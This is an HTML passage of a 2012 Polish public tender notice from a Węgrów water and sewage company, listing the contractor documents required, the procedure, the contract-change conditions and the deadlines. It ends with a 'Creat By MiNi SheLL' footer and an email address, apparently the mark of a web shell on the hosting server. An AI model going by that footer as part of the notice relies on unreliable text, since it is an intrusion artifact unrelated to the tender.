<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">referencje wykonanych robót</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Formularz Oferty,
b)	Zobowiązanie podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia,
c)	Wykaz kluczowych urządzeń technologicznych, które Wykonawca oferuje do realizacji przedmiotowego zamówienia,
d)	Tabela elementów scalonych,
e)	stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej,
f)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.
g)	dowód wniesienia wadium,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Niedopuszczalna jest zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem poniższych przypadków:
1)	zmiany terminu wykonania Umowy w przypadku:
a)	wystąpienia kolizji z niezinwentaryzowanymi sieciami,
b)	konieczności przeprowadzenia innych prac niezidentyfikowanych,
c)	zmian będących następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:
a.a)	wstrzymanie realizacji umowy przez Zamawiającego,
a.b)	konieczność usunięcia błędów lub wprowadzenia zmian w Dokumentacji projektowej,
d)	zmiany będące następstwem działania organów administracji, w szczególności:
a.a)	przekroczenie określonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń itp.,
a.b)	odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w Dokumentacji projektowej,
a.c)	wydanie postanowienia o wstrzymaniu robót budowlanych w przypadku, o którym mowa w art. 50 ust. 1 pkt 4 Prawa budowlanego,
a.d)	konieczność uzyskania wyroku sądowego lub innego orzeczenia sądu lub organu, którego konieczności nie przewidywano przy zawieraniu Umowy,
a.e)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami,
2)	obniżenie kosztu wykonania robót i tym samym wynagrodzenia Wykonawcy,
3)	wydłużenia terminu gwarancji,
4)	poprawy jakości lub innych parametrów charakterystycznych dla danego elementu robót lub zmianę technologii,
5)	podniesienia bezpieczeństwa,
6)	aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów,
7)	rezygnacji z części robót i tym samym obniżenie wynagrodzenia Wykonawcy,
8)	zmiany w kolejności i terminach wykonania robót,
9)	zmiany Podwykonawców,
10)	zmiana nr konta Wykonawcy lub innych danych podmiotowych,
11)	ustawowa zmiana stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwikwegrow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Wodociągów i Kanalizacji Sp. z o.o.
ul. K. Szamoty 42 B
07-100 Węgrów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.02.2012 godzina 10:00, miejsce: Otwarcie ofert nastąpi w siedzibie Zamawiającego, tj.:
Przedsiębiorstwo Wodociągów i Kanalizacji Sp. z o.o., ul. K. Szamoty 42 b, 07-100 Węgrów, pokój nr 3..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt ubiega się o współfinansowanie przez Unię Europejską w ramach Programu Operacyjnego Infrastruktura i Środowisko oś priorytetowa I gospodarka wodno-ściekowa, działanie 1.1 - gospodarka wodno-ściekowa w aglomeracjach powyżej 15 tyś. RLM na lata 2007 - 2013 (projekt o wartości poniżej 25 mln euro) i ma za zadanie przyczynić się do zmniejszenia różnic społecznych i gospodarczych pomiędzy obywatelami Unii..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com